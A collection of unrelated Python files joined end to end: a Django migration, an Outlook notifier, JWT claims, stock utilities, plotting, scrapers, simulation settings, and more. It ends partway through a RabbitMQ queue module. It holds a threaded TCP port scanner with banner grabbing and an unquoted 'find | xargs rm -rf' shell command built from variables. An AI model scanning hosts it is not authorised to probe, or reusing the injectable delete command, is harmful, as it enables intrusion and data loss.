                    HostDictionary.pop(rfc,None)
                else:
                    for i in range(0,l-1):
                        if NameOfClient in individualhosts[i]:
                            print NameOfClient
                            variable = i
                            individualhosts.remove(NameOfClient)
                            # rebuild the '-'-terminated host string without it
                            temp=""
                            for j in range(0,l-2):
                                temp=temp+individualhosts[j]+"-"
                            HostDictionary[rfc] = temp
            if PeerDictionary.has_key(NameOfClient):
                PeerDictionary.pop(NameOfClient,None)
            connection.close()
            break
# Accept loop: each incoming peer connection gets its own handler thread.
while 1:
    connection, addr = SocketOfServer.accept()
    print 'Got incoming connection request from ', addr
    start_new_thread(initialization, (connection, addr))
# NOTE(review): unreachable - the loop above never exits.
SocketOfServer.close()
|
# Generated by Django 2.0.2 on 2019-10-17 13:33
from django.db import migrations
class Migration(migrations.Migration):
    """Fix the typo in the product vote-count field name (votes_totla -> votes_total)."""
    dependencies = [
        ('products', '0002_auto_20191015_1340'),
    ]
    operations = [
        migrations.RenameField(
            model_name='product',
            old_name='votes_totla',
            new_name='votes_total',
        ),
    ]
|
# sending emails with python
# -*- coding: utf-8 -*-
import logging
import os
import subprocess

import psutil
import win32com.client as win32
# Drafting and sending email notification to senders. You can add other senders' email in the list
def send_notification(recipient: str, textbody: str):
    """Draft and send an Outlook e-mail notification via COM automation.

    :param recipient: e-mail address (or ';'-separated addresses) to notify.
    :param textbody: plain-text body of the message.
    """
    outlook = win32.Dispatch("Outlook.Application")
    mail = outlook.CreateItem(0)  # 0 == olMailItem
    mail.To = recipient
    mail.Subject = 'Certificate warning'  # typo fix: was 'Certificate warnining'
    mail.Body = textbody  # canonical COM property name is 'Body'
    # Bug fix: 'mail.send' merely referenced the method without calling it,
    # so the message was drafted but never actually sent.
    mail.Send()
# Open Outlook.exe. Path may vary according to system config
# Please check the path to .exe file and update below
def open_outlook():
    """Launch Outlook.exe.

    Path may vary according to system config - please check the path to the
    .exe file and update below.
    """
    # Bug fix: the path must be a raw string - in the original non-raw
    # literal, '\root' contained the escape '\r' (carriage return), so the
    # path could never match the real file.  The redundant second launch via
    # os.system of the same executable was also removed.
    outlook_path = r'C:\Program Files (x86)\Microsoft Office\root\Office16\Outlook.exe'
    try:
        subprocess.call([outlook_path])
    except Exception:
        # requires 'import logging' at module level (previously missing,
        # which made this handler raise NameError)
        logging.error("Outlook didn't open successfully")
# Checking if outlook is already opened. If not, open Outlook.exe and send email
def check_and_send_mail(recipient: str, textbody: str):
    """Send an e-mail notification, starting Outlook first if it is not running.

    :param recipient: e-mail address to notify.
    :param textbody: plain-text body of the message.
    """
    # Bug fix: the original left 'flag' unbound when psutil.pids() returned
    # no processes, raising NameError; use an explicitly initialised flag.
    outlook_running = False
    for pid in psutil.pids():
        if psutil.Process(pid).name() == "OUTLOOK.EXE":
            outlook_running = True
            break
    if not outlook_running:
        open_outlook()
    send_notification(recipient, textbody)
|
from rest_framework_simplejwt.serializers import TokenObtainPairSerializer
from rest_framework_simplejwt.views import TokenObtainPairView
class CustomObtainPairSerializer(TokenObtainPairSerializer):
    """Token serializer that embeds extra user claims in the JWT payload."""

    @classmethod
    def get_token(cls, user):
        """Build the token for *user*, adding a staff flag and display name."""
        token = super().get_token(user)
        # Custom claims carried inside the token payload.
        token['is_staff'] = user.is_staff
        token['name'] = "{} {}".format(user.first_name, user.last_name)
        return token
class CustomObtainPairView(TokenObtainPairView):
    """Token-obtain endpoint wired to CustomObtainPairSerializer."""
    serializer_class = CustomObtainPairSerializer
from .model import ClsModel |
import os
import sys
from multiprocessing import Process
from enum import Enum
try:
from enum import IntFlag
except:
pass
from z import getp, setp
import logging
import util
try:
    # Bitmask of display/processing modes; values are powers of two so they
    # can be OR-ed together. Wrapped in try/except because IntFlag may not
    # have been imported above (it needs Python 3.6+), in which case the
    # class is silently unavailable.
    class Modes(IntFlag):
        none = 0
        trim = 1
        zoom = 2
        average = 4
        more = 8
        change = 16
        target = 32
        recent = 64
        multi = 128
        history = 256
        sort = 512
except:
    pass
#bar = Modes.zoom
#bar |= Modes.average
#if Modes.zoom in bar:
# print ("so far so good")
#bar ^= Modes.zoom
#if Modes.zoom in bar:
# print ("so far so good")
class Zen(Enum):
    """Keys used with settings() to persist session state between runs."""
    lastStock = 0
    lastMode = 1
    prevAnswer = 2
#def setSettings():
def settings(setting, setValue = None, default = None):
    """Get or set a persisted setting.

    The settings dict is cached on the function object (settings.setdict)
    and persisted through the z module's getp()/setp() under the key
    "settings".

    :param setting: Key to read or write (e.g. a Zen enum member).
    :param setValue: When not None, store this value; otherwise read.
    :param default: Returned on a read when the key cannot be found.
    """
    if setValue is not None:  # write path (original used `!= None`)
        try:
            settings.setdict[setting] = setValue
        except Exception:
            # Cache missing or unusable: try the persisted copy first,
            # then fall back to a brand-new dict.
            try:
                settings.setdict = getp("settings")
                settings.setdict[setting] = setValue
            except Exception:
                settings.setdict = dict()
                settings.setdict[setting] = setValue
        setp(settings.setdict, "settings")
    else:  # read path
        try:
            return settings.setdict[setting]
        except Exception:
            try:
                settings.setdict = getp("settings")
                return settings.setdict[setting]
            except Exception:
                pass
        return default
#print (settings(Zen.lastStock))
#settings(Zen.lastStock, 2)
#print (settings(Zen.lastStock))
# if setting == Settings.lastStock:
# return True
#
def restart_program():
    """Restarts the current program, with file objects and descriptors
    cleanup (best effort), by exec()ing a fresh interpreter with the same
    argv.
    """
    try:
        # NOTE(review): this looks like psutil API (psutil.Process(pid),
        # open_files()/connections()), but Process here is
        # multiprocessing.Process, which takes no pid argument and has no
        # get_open_files(); this block therefore always raises and the
        # descriptor cleanup is silently skipped -- confirm intent.
        p = Process(os.getpid())
        for handler in p.get_open_files() + p.connections():
            os.close(handler.fd)
    except:
        pass
    # logging.error(e)
    # Replace the current process image with a fresh interpreter running
    # the same script and arguments.
    python = sys.executable
    os.execl(python, python, *sys.argv)
class Cursor(object):
    """Crosshair on a matplotlib axes that follows the mouse pointer."""

    def __init__(self, ax):
        self.ax = ax
        self.lx = ax.axhline(color='k')  # horizontal crosshair line
        self.ly = ax.axvline(color='k')  # vertical crosshair line
        # Coordinate readout, positioned in axes-relative coordinates.
        self.txt = ax.text(0.7, 0.9, '', transform=ax.transAxes)

    def mouse_move(self, event):
        """Reposition the crosshair and readout at the cursor location."""
        if not event.inaxes:
            return
        xpos, ypos = event.xdata, event.ydata
        self.lx.set_ydata(ypos)
        self.ly.set_xdata(xpos)
        self.txt.set_text('x=%1.2f, y=%1.2f' % (xpos, ypos))
        plt.draw()
class SnaptoCursor(object):
    """
    Like Cursor but the crosshair snaps to the nearest x,y point
    For simplicity, I'm assuming x is sorted

    NOTE(review): `np` and `plt` are not imported in this module --
    presumably provided by the plotting environment; verify before use.
    """
    def __init__(self, ax, x, y):
        self.ax = ax
        self.lx = ax.axhline(color='k')  # the horiz line
        self.ly = ax.axvline(color='k')  # the vert line
        # Data series the crosshair snaps onto.
        self.x = x
        self.y = y
        # text location in axes coords
        self.txt = ax.text(0.7, 0.9, '', transform=ax.transAxes)

    def mouse_move(self, event):
        if not event.inaxes:
            return
        x, y = event.xdata, event.ydata
        # Snap to the nearest data point at or right of the cursor
        # (binary search relies on self.x being sorted).
        indx = np.searchsorted(self.x, [x])[0]
        x = self.x[indx]
        y = self.y[indx]
        # update the line positions
        self.lx.set_ydata(y)
        self.ly.set_xdata(x)
        self.txt.set_text('x=%1.2f, y=%1.2f' % (x, y))
        print('x=%1.2f, y=%1.2f' % (x, y))
        plt.draw()
# Window size used by averageValues(); adjusted at runtime via increaseAvg().
avgFactor = 5

def increaseAvg(add):
    """Grow the averaging window by 2, or shrink it by 2 (never below 3).

    :param add: True widens the window, False narrows it.
    """
    global avgFactor
    if add:
        avgFactor += 2
    elif avgFactor > 4:
        avgFactor -= 2

def averageValues(values):
    """Return a forward moving average of *values* over avgFactor samples.

    Positions too close to the end (no full window remaining) repeat the
    last computed average.
    """
    window = float(avgFactor)
    total = len(values)
    smoothed = []
    previous = 0
    for start in range(total):
        stop = start + avgFactor
        if stop < total:
            current = round(sum(values[start:stop]) / window, 4)
        else:
            current = previous
        smoothed.append(current)
        previous = current
    return smoothed
def dailyAverage(opens, closes):
    """Summarise close/open price ratios.

    :param opens: Sequence of opening prices.
    :param closes: Sequence of closing prices (parallel to *opens*).
    :return: (average negative ratio, worst negative ratio, average ratio
        over the last ~60 entries), each via util.formatDecimal, or
        (None, None, None) when there is nothing to average.
    """
    negs = []
    davg = len(opens) - 60
    davglist = []
    for i, closed in enumerate(closes):
        temp = closed / opens[i]
        if i > davg:
            davglist.append(temp)
        if temp < 1:
            negs.append(temp)
    try:
        ret1 = util.formatDecimal(sum(negs) / len(negs))
        ret2 = util.formatDecimal(min(negs))
        davg = util.formatDecimal(sum(davglist) / len(davglist))
        return ret1, ret2, davg
    except (ZeroDivisionError, ValueError):
        # Bug fix: the bare except also hid real errors (e.g. from util);
        # only "no negative days / no data" cases are expected here.
        pass
    return None, None, None
def changeValues(values, by = 5, negavg = False):
    """Compute the ratio values[i+by]/values[i] at every position.

    Positions without a full look-ahead repeat the last computed ratio.
    When *negavg* is True, return only the average of the ratios below 1.0
    (via util.formatDecimal) instead of the ratio list.
    """
    total = len(values)
    ratios = []
    declines = []
    previous = 0
    for start in range(total):
        stop = start + by
        if stop < total:
            ratio = round(values[stop] / float(values[start]), 4)
            if negavg and ratio < 1:
                declines.append(ratio)
        else:
            ratio = previous
        ratios.append(ratio)
        previous = ratio
    if negavg:
        return util.formatDecimal(sum(declines) / len(declines))
    return ratios
#print changeValues([i for i in range(1,40)])
#print [i for i in range(40)]
def clearDir(dirname, search = None):
    """Delete files under *dirname*, optionally only names matching *search*.

    Refuses to act unless the resolved path contains "zen_dump", as a guard
    against wiping an unintended directory.
    """
    path = util.getPath(dirname)
    if "zen_dump" not in path:
        return
    try:
        cmd = ""
        if search:
            # SECURITY NOTE(review): path/search are interpolated into a
            # shell pipeline unquoted; a value containing spaces or shell
            # metacharacters would break or broaden the `rm -rf`. Only
            # acceptable if inputs are trusted/internal.
            cmd = "find {} | grep {} | xargs rm -rf".format(path, search)
        else:
            cmd = "find {} -type f | xargs rm -rf".format(path)
        os.system(cmd)
    except:
        pass
def getFiles(where, his_idx = None):
    """Return sorted paths of files named "<where>_<idx>_...csv..." inside
    the *where* directory, caching the result on the function object.

    NOTE(review): the cache (getFiles.rememberedFiles) is keyed on nothing
    -- a second call with a different *where* or *his_idx* returns the
    first call's results. Confirm only one combination is used per process.

    :param where: Directory name (also the required filename prefix).
    :param his_idx: Optional index the second "_" field must equal.
    """
    import fnmatch
    if getFiles.rememberedFiles:
        return getFiles.rememberedFiles
    holds = []
    parentdir = util.getPath(where)
    listOfFiles = os.listdir(parentdir)
    for entry in listOfFiles:
        date = entry.split("_")
        try:
            # Skip entries that don't look like "<where>_<idx>_...csv...".
            if len(date) < 3 or date[0] != where or \
                (his_idx and int(date[1]) != his_idx) or \
                "csv" not in date[2]:
                continue
        except:
            continue
        pattern = "{}*".format(where)
        if fnmatch.fnmatch(entry, pattern):
            getFiles.rememberedFiles.append("{}/{}".format(parentdir, entry))
    getFiles.rememberedFiles.sort()
    return getFiles.rememberedFiles
# Cross-call cache of previously listed files (see docstring note).
getFiles.rememberedFiles = []
def getNextHisSelection(increment = 1):
    """Return the path of the next standard-selection history CSV.

    Successive calls step through selection indices 3..9; the cursor lives
    on the function attribute ``idx`` and advances by *increment*.
    """
    indices = [n for n in range(3, 10)]
    selected = indices[getNextHisSelection.idx]
    path = util.getPath("history/selection_standard_{}.csv".format(selected))
    getNextHisSelection.idx += increment
    return path
# Cursor into the 3..9 selection-index list.
getNextHisSelection.idx = 0
def getNextHis(increment = True):
    """Step forward (or back) through the cached history file list and
    return the file at the new cursor position.

    Rewinds to the first history file when the cursor runs off either end
    of the list or before the cursor attribute exists.
    """
    try :
        if increment:
            getNextHis.idx += 1
        elif getNextHis.idx > 0:
            getNextHis.idx -= 1
        ret = getFiles(where = "history")[getNextHis.idx]
        if ret:
            return ret
        # Empty entry: rewind to the start of the list.
        getNextHis.idx = 0
        return getFiles(where = "history")[getNextHis.idx]
    except:
        # Cursor out of range: rewind and retry.
        getNextHis.idx = 0
        return getFiles(where = "history")[getNextHis.idx]
    # Unreachable: both branches above return.
    return None
# Cursor into the history file list.
getNextHis.idx = 0
|
import optparse
from socket import *
from threading import *
screenLock=Semaphore(value=1)
def connScan(tgtHost, tgtPort):
    """Attempt a TCP connect to tgtHost:tgtPort and report open/closed.

    Sends a small probe and prints whatever banner the service replies
    with. Printing is serialised through the module-level screenLock.
    """
    connSkt = None
    try:
        connSkt = socket(AF_INET, SOCK_STREAM)
        connSkt.connect((tgtHost, tgtPort))
        # Bug fix: Python 3 sockets require bytes; sending the str 'Hi!'
        # raised TypeError and made every port report as closed.
        connSkt.send(b'Hi!')
        result = connSkt.recv(100)
        screenLock.acquire()
        print('[+]%d/tcp open' % tgtPort)
        print('[+]' + str(result))
    except Exception:
        # Any connect/send/recv failure is treated as a closed port.
        screenLock.acquire()
        print('[+]%d/tcp closed' % tgtPort)
    finally:
        screenLock.release()
        # Bug fix: guard the close -- if socket() itself failed, the name
        # would otherwise be unbound here.
        if connSkt is not None:
            connSkt.close()
def portScann(tgtHost,tgtPort):
    """Resolve *tgtHost* and scan each port in *tgtPort* concurrently.

    :param tgtHost: Hostname or IP address to scan.
    :param tgtPort: Iterable of port numbers (strings accepted).
    """
    try:
        tgtIP=gethostbyname(tgtHost)
    except:
        print('[-] Cannot resolve %s' %tgtHost)
        return
    try:
        # Prefer the reverse-DNS name in the banner when available.
        tgtName=gethostbyaddr(tgtIP)
        print('\n[+] Scan results for :'+tgtName[0])
    except:
        print('\n[+] Scan results for :'+tgtIP)
    # Global 1-second socket timeout so closed/filtered ports fail fast.
    setdefaulttimeout(1)
    for Port in tgtPort:
        # One thread per port; connScan serialises output via screenLock.
        t=Thread(target=connScan,args=(tgtHost,int(Port)))
        t.start()
def main():
    """Parse the -H/-p command-line options and kick off the port scan."""
    parser = optparse.OptionParser('Usage %prog' + '-H <targetHost> -p <target port>')
    parser.add_option('-H', dest='tgtHost', type='string', help='specify target host')
    parser.add_option('-p', dest='tgtPort', type='string', help='specify target port[s] separated by comma')
    (options, args) = parser.parse_args()
    tgtHost = options.tgtHost
    # Bug fix: the original tested tgtPort[0]==None AFTER str().split(','),
    # which can never be None (a missing option becomes the string "None").
    # Test the raw option values, with `is None` and boolean `or`.
    if (tgtHost is None) or (options.tgtPort is None):
        print(parser.usage)
        exit(0)
    tgtPort = str(options.tgtPort).split(',')
    portScann(tgtHost, tgtPort)

if __name__ == "__main__":
    main()
import torch
import torch.nn as nn
import torch.nn.functional as F
def top_filtering(logits, top_k=0, top_p=0.0, filter_value=-float('Inf')):
    """ Filter a distribution of logits using top-k, top-p (nucleus) and/or threshold filtering
        Args:
            logits: logits distribution shape (batch size, vocabulary size)
            top_k: <=0: no filtering, >0: keep only top k tokens with highest probability.
            top_p: <=0.0: no filtering, >0.0: keep only a subset S of candidates, where S is the smallest subset
                whose total probability mass is greater than or equal to the threshold top_p.
                In practice, we select the highest probability tokens whose cumulative probability mass exceeds
                the threshold top_p.
            filter_value: value written into filtered-out positions (default -inf).
    """
    # batch support!
    if top_k > 0:
        # Keep only the k largest logits per row; everything strictly below
        # the k-th largest value is masked out.
        values, _ = torch.topk(logits, top_k)
        min_values = values[:, -1].unsqueeze(1).repeat(1, logits.shape[-1])
        # Bug fix: the original hard-coded -inf here, silently ignoring the
        # filter_value parameter in the top-k branch; use it consistently.
        logits = torch.where(logits < min_values,
                             torch.ones_like(logits, dtype=logits.dtype) * filter_value,
                             logits)
    if top_p > 0.0:
        # Compute cumulative probabilities of sorted tokens
        sorted_logits, sorted_indices = torch.sort(logits, descending=True)
        cumulative_probabilities = torch.cumsum(F.softmax(sorted_logits, dim=-1), dim=-1)
        # Remove tokens with cumulative probability above the threshold
        sorted_indices_to_remove = cumulative_probabilities > top_p
        # Shift the indices to the right to keep also the first token above the threshold
        sorted_indices_to_remove[..., 1:] = sorted_indices_to_remove[..., :-1].clone()
        sorted_indices_to_remove[..., 0] = 0
        sorted_logits = sorted_logits.masked_fill_(sorted_indices_to_remove, filter_value)
        # Scatter the filtered values back into their original positions.
        logits = torch.zeros_like(logits).scatter(1, sorted_indices, sorted_logits)
    return logits
import pickle
import math
import time
import numpy as np
from plotly.offline import plot
import plotly.graph_objs as go
from compute import grid_analytical_logF_conditional, sum_F_smart
from definitions import large_log_sum_array
from conditions import cond_map
def main():
    """Entry point: plot container-type counts vs cardinality for M=65536.

    The compute_count_vs_n() call and the alternate plot modes are kept
    below, commented out, for regenerating data or other views.
    """
    # compute_count_vs_n(65536, 64)
    plot_count_vs_n(65536, mode='count', regions='iarray')
    #plot_count_vs_n(65536, mode='freq', regions='iarray')
    #plot_count_vs_n(65536, mode='count', regions='array')
    #plot_count_vs_n(65536, mode='freq', regions='array')
def counts_to_freqs(data):
    """Normalise log counts into log frequencies in place.

    Subtracts data['max'] (elementwise maximum over the basic container
    series) from every per-container-type series in both region groups.
    """
    peak = data['max']
    for series in ('array', 'bitmap', 'runs'):
        data['array'][series] -= peak
    # data['iarray']['array'] is the very same object as
    # data['array']['array'], so it is intentionally not adjusted again.
    for series in ('iarray', 'runs_iarray', 'bitmap_iarray'):
        data['iarray'][series] -= peak
def plot_count_vs_n(M, mode='count', regions='array'):
    """Plot per-container-type log counts (or log frequencies) against
    cardinality from a previously pickled data file.

    NOTE(review): Python 2 idioms -- the pickle is opened in text mode
    ('r'), xticks relies on integer division (M/8), and map() is passed
    directly as ticktext; these need changes under Python 3.

    :param M: Universe size (also part of the pickle file name).
    :param mode: 'count' for raw log counts, 'freq' to normalise via
        counts_to_freqs() first.
    :param regions: Top-level series group to plot ('array' or 'iarray').
    """
    fname = 'data/count-vs-n-%s.pickle' % (M)
    with open(fname, 'r') as f:
        data = pickle.load(f)
    title = 'Container type count vs cardinality (log scale)'
    ytitle = 'Log count'
    if mode == 'freq':
        title = 'Container type frequency vs cardinality (log scale)'
        ytitle = 'Log probability'
        counts_to_freqs(data)
    traces = []
    c_vec = data['c']
    keys = data[regions].keys()
    # sort the keys for consistent trace order
    for k in sorted(keys):
        traces.append({'x': c_vec, 'y': data[regions][k], 'name': k})
    # full view
    xticks = range(0, M+1, M/8)
    # zoom view
    # xticks = range(0, M/8+1, M/64)
    layout = go.Layout(
        title=title,
        xaxis={'title': 'N (cardinality)', 'tickvals': xticks, 'ticktext': map(str, xticks)},
        yaxis={'title': ytitle},
    )
    fig = go.Figure(data=traces, layout=layout)
    plot(fig, filename='figures/count-vs-n.html')
def compute_count_vs_n(M=65536, step=64):
    """For each sampled cardinality c, evaluate sum_F_smart under every
    condition in cond_map and pickle the per-container-type results.

    NOTE(review): Python 2 idioms -- range(0, M/2+1) relies on integer
    division and the pickle is written in text mode ('w').

    :param M: Universe size.
    :param step: Cardinality sampling step.
    """
    MA, MR = 4096, 2048
    c_vec = np.arange(0, M+1, step)
    # add some extra values to check for sharper curve definition
    # these values are just left/right of the cardinality bounds
    b0 = [1, 2, 4, 65532, 65534, 65535]
    b1 = [4095, 4096, 4097]
    b2 = [61439, 61440, 61441]
    b3 = [63487, 63488, 63489]
    b4 = range(62976, 63488, 32)
    c_vec = np.hstack((c_vec, b0, b1, b2, b3, b4))
    c_vec.sort()
    # z_array = np.zeros(c_vec.shape) # cond_map avoids having to repeat a line like this 6 times
    # One result vector per container-type condition.
    z = {}
    for ctype in cond_map:
        z[ctype] = np.zeros(c_vec.shape)
    # Admit every run count, leaving the sum unconstrained in that variable.
    def f_all(M, MA, card):
        return range(0, M/2+1)
    t0 = time.time()
    for n, c in enumerate(c_vec):
        print('%d/%d, %d (%f sec)' % (n, len(c_vec)+1, c, time.time() - t0))
        # z_array[n] = sum_F_smart(M, MA, [c], f_all, array_cond_mutex(M, MA))
        for ctype, cond in cond_map.items():
            z[ctype][n] = sum_F_smart(M, MA, [c], f_all, cond(M, MA))
    fname = 'data/count-vs-n-%s.pickle' % (M)
    data = {
        'c': c_vec,
        # Elementwise max over the three basic series; used by
        # counts_to_freqs() to turn counts into probabilities.
        'max': np.max(np.vstack((z['array'], z['bitmap'], z['runs'])), axis=0),
        'array': {
            'array': z['array'],
            'runs': z['runs'],
            'bitmap': z['bitmap'],
        },
        'iarray': {
            'array': z['array'],
            'iarray': z['iarray'],
            'runs_iarray': z['runs_iarray'],
            'bitmap_iarray': z['bitmap_iarray'],
        },
    }
    with open(fname, 'w') as f:
        pickle.dump(data, f)
main() |
from time import sleep
from dateutil import parser
import datetime
import database
import pytz
import json
refresh = True # for debug
frequency = 10 # in minutes
"""
Why is this file called witchdoctor?
This file is called witchdoctor because it magically
handles all of the backend data parsing.
Simply fire it up and it will magically keep the database updated!
It'll also do all the magical ranking things. Isn't it just incredible?
"""
def now():
    """Return the current time as a timezone-aware datetime in US Eastern."""
    eastern = pytz.timezone('America/New_York')
    return datetime.datetime.now(eastern)
def timedelta(d):
    """Return the elapsed time since datetime *d*.

    NOTE(review): shadows the ``timedelta`` name from the datetime module
    within this file. Subtracting a naive *d* from the timezone-aware
    now() raises TypeError; in that case fall back to a naive comparison.
    """
    try:
        return now() - d
    except TypeError as error:
        return datetime.datetime.now() - d
def hoursago(d):
    """Return how many hours ago datetime *d* was, as a float.

    Bug fix: the original used ``diff.seconds / 3600.0``, which ignores
    the ``.days`` component of the delta, so anything older than 24 hours
    wrapped around to a small value (and was over-ranked by the caller's
    age-decayed score). total_seconds() accounts for whole days.
    """
    diff = timedelta(d)
    return diff.total_seconds() / 3600.0
def prettydate(d):
    """Return a human-friendly age string for datetime *d*.

    Falls back to an absolute date for anything older than a week (or in
    the future).
    """
    diff = timedelta(d)
    s = diff.seconds
    if diff.days > 7 or diff.days < 0:
        return d.strftime('%d %b %y')
    elif diff.days == 1:
        return '1 day ago'
    elif diff.days > 1:
        return '{} days ago'.format(diff.days)
    elif s < 3600:
        return '< 1 hour ago'
    elif s < 7200:
        return '1 hour ago'
    else:
        # Bug fix for Python 3 compatibility: floor division keeps the
        # output as e.g. "5 hours ago" rather than "5.1234 hours ago"
        # (identical to Python 2's integer division).
        return '{} hours ago'.format(s // 3600)
def refresh_data():
    """Endless loop: reload all feeds, score and rank every story, and
    write the ranked list to data/ranked.json, sleeping `frequency`
    minutes between passes.

    NOTE(review): Python 2 style (dict.iterkeys()); `refresh` is a module
    flag that can be cleared to skip passes while keeping the loop alive.
    """
    global refresh, frequency
    while True:
        if refresh:
            print("Refreshing the feeds!")
            database.load_feeds() # database.load_feeds() also writes to data/sources.json
            # Now it's time to score these stories.
            print("Ranking stories....")
            collection = [] # all the stories in one array
            for source in database.sources_stable.iterkeys(): # build our collection array
                collection.extend(database.sources_stable[source]["stories"].values())
            print("Collection has " + str(len(collection)) + " stories.")
            for story in collection:
                time = parser.parse(story["published"])
                hoursAgo = hoursago(time)
                story["timeAgo"] = prettydate(time)
                # Score: feed position (earlier is better), boosted by
                # channel count, decayed by age in hours.
                score = ((((story["max"] - story["index"] + 1)/story["max"])*(1+len(story["channels"])/3.0))**2)/((hoursAgo+18)/18.0)
                story["score"] = score
            # NOTE(review): sorted() ascending puts the LOWEST score first
            # -- confirm consumers of ranked.json expect that order.
            ranked = sorted(collection, key=lambda k: k['score'])
            leaning_scores = {}
            for story in ranked:
                print(story["source"] + ": " +story["title"] + ": " + str(story["score"]))
                leaning = database.sources_stable[story["source"]]["leaning"]
                if leaning in leaning_scores:
                    leaning_scores[leaning] += story["score"]
                else:
                    leaning_scores[leaning] = story["score"]
            for leaning in leaning_scores.keys():
                print(leaning + " sum score: " + str(leaning_scores[leaning]))
            print("...ranked stories, putting to data/ranked.json")
            with open("data/ranked.json", "w") as output_file:
                json.dump({
                    "ranked": ranked
                }, output_file)
            print("Found " + str(len(collection)) + " stories.")
        sleep(60*frequency)
refresh_data()
|
import nltk
from nltk.corpus import wordnet as wn
from bs4 import BeautifulSoup
import urllib3
import html5lib
from tqdm import tqdm
def findOrigins(word):
    """Scrape dictionary.com for the origin languages of *word*.

    :param word: The word to look up.
    :return: List of language names found on the page (possibly empty).
    """
    urllib3.disable_warnings()
    http = urllib3.PoolManager()
    # Bug fix: the URL was hard-coded to ".../browse/antique", so every
    # lookup returned the origins of "antique". Build it from the argument.
    url = "http://www.dictionary.com/browse/" + word
    response = http.request('GET', url)
    soup = BeautifulSoup(response.data, "lxml")
    ety = soup.findAll("a", {"class": "language-name"})
    fin_ety = []
    if len(ety) != 0:
        for i in range(len(ety)):
            fin_ety.append(ety[i].text)
    return fin_ety
def rep(word):
    """Return *word* with underscore separators turned into spaces."""
    return word.replace('_', ' ')
# Build the list of all WordNet lemmas with underscores turned into spaces.
words = []
for word in wn.words():
    ts = rep(word)
    words.append(ts)
# Accumulate the set of origin languages across every word, checkpointing
# to disk every 1000 words since the scrape is slow and may be interrupted.
origins = set()
for i in tqdm(range(len(words)), desc = 'Progress'):
    if len(findOrigins(words[i])) != 0:
        # NOTE(review): findOrigins() is called twice per word here -- one
        # network round trip could be saved by reusing the first result.
        o = findOrigins(words[i])
        for j in range(len(o)):
            origins.add(o[j])
    if i % 1000 == 0:
        with open('interim_origins.txt', 'w') as f:
            f.write(str(origins))
with open('origins.txt', 'w') as myFile:
    myFile.write(str(origins))
|
#!/usr/bin/env python3
#
# This example shows how to run a combined fluid-kinetic simulation with
# with both the hot-tail and runaway electron grids.
#
# Run as
#
# $ ./basic.py
# $ ../../build/iface/dreami dream_settings.h5
#
# ###################################################################
import numpy as np
import sys
sys.path.append('../../py/')
from DREAM.DREAMSettings import DREAMSettings
import DREAM.Settings.Equations.IonSpecies as Ions
import DREAM.Settings.Solver as Solver
import DREAM.Settings.CollisionHandler as Collisions
import DREAM.Settings.Equations.DistributionFunction as DistFunc
import DREAM.Settings.Equations.RunawayElectrons as Runaways
import DREAM.Settings.Equations.RunawayElectronDistribution as REDist
ds = DREAMSettings()
# Plasma parameters for this run.
E = 0.6 # Electric field strength (V/m)
n = 5e19 # Electron density (m^-3)
T = 1e3 # Temperature (eV)
# Toggle: resolve the runaway region kinetically on the f_re grid.
re_enabled = True
# Set E_field
ds.eqsys.E_field.setPrescribedData(E)
# Set temperature
ds.eqsys.T_cold.setPrescribedData(T)
# Set ions
ds.eqsys.n_i.addIon(name='D', Z=1, iontype=Ions.IONS_PRESCRIBED_FULLY_IONIZED, n=n)
# Disable hot-tail grid
ds.hottailgrid.setEnabled(False)
ds.collisions.collfreq_mode = Collisions.COLLFREQ_MODE_ULTRA_RELATIVISTIC
#ds.collisions.collfreq_mode = Collisions.COLLFREQ_MODE_SUPERTHERMAL
# Set initial hot electron Maxwellian
#ds.eqsys.f_hot.setInitialProfiles(n0=2*n, T0=T)
# Include Dreicer and avalanche
ds.eqsys.n_re.setAvalanche(Runaways.AVALANCHE_MODE_FLUID)
ds.eqsys.n_re.setDreicer(Runaways.DREICER_RATE_NEURAL_NETWORK)
ds.eqsys.n_re.setInitialProfile(1e15)
# Runaway grid: resolved kinetically when re_enabled, otherwise disabled.
pmax_re = 0.5
if re_enabled:
    ds.runawaygrid.setNxi(50)
    ds.runawaygrid.setNp(100)
    ds.runawaygrid.setPmax(pmax_re)
    # Use flux limiters
    ds.eqsys.f_re.setAdvectionInterpolationMethod(ad_int=DistFunc.AD_INTERP_TCDF)
    # Set initialization method
    ds.eqsys.f_re.setInitType(REDist.INIT_ISOTROPIC)
else:
    ds.runawaygrid.setEnabled(False)
# Set up radial grid
ds.radialgrid.setB0(5)
ds.radialgrid.setMinorRadius(0.22)
ds.radialgrid.setWallRadius(0.22)
ds.radialgrid.setNr(1)
# Solver: nonlinear (the linear-implicit alternative is kept commented).
#ds.solver.setType(Solver.LINEAR_IMPLICIT)
ds.solver.setType(Solver.NONLINEAR)
ds.solver.setVerbose(True)
ds.solver.tolerance.set('j_re', reltol=1e-4)
ds.other.include('fluid')
# Set time stepper
ds.timestep.setTmax(1e-1)
ds.timestep.setNt(20)
# Save settings to HDF5 file
ds.save('dream_settings.h5')
|
"""
The rabbitpy.queue module contains two classes :py:class:`Queue` and
:py:class:`Consumer`. The :py:class:`Queue` class is an object that is used to
create and work with queues on a RabbitMQ server. The :py:class:`Consumer`
contains a generator method, :py:meth:`next_message <Consumer.next_message>`
which returns messages delivered by RabbitMQ. The :py:class:`Consumer` class
should not be invoked directly, but rather by the
:py:meth:`Queue.consumer() <Queue.consumer>` method::
with conn.channel() as channel:
queue = rabbitpy.Queue(channel, 'example')
for message in queue.consume_messages():
print 'Message: %r' % message
message.ack()
"""
import contextlib
import logging
from pamqp import specification
from rabbitpy import base
from rabbitpy import utils
LOGGER = logging.getLogger(__name__)
class Queue(base.AMQPClass):
    """Create and manage RabbitMQ queues.

    :param channel: The channel object to communicate on
    :type channel: :py:class:`rabbitpy.channel.Channel`
    :param str name: The name of the queue
    :param exclusive: Queue can only be used by this channel and will
                      auto-delete once the channel is closed.
    :type exclusive: bool
    :param durable: Indicates if the queue should survive a RabbitMQ restart
    :type durable: bool
    :param bool auto_delete: Automatically delete when all consumers disconnect
    :param int max_length: Maximum queue length
    :param int message_ttl: Time-to-live of a message in milliseconds
    :param expires: Milliseconds until a queue is removed after becoming idle
    :type expires: int
    :param dead_letter_exchange: Dead letter exchange for rejected messages
    :type dead_letter_exchange: str
    :param dead_letter_routing_key: Routing key for dead lettered messages
    :type dead_letter_routing_key: str
    :param dict arguments: Custom arguments for the queue
    """
    def __init__(self, channel, name='',
                 durable=True, exclusive=False, auto_delete=False,
                 max_length=None, message_ttl=None, expires=None,
                 dead_letter_exchange=None, dead_letter_routing_key=None,
                 arguments=None):
        super(Queue, self).__init__(channel, name)

        # Validate Arguments
        for var, vname in [(auto_delete, 'auto_delete'), (durable, 'durable'),
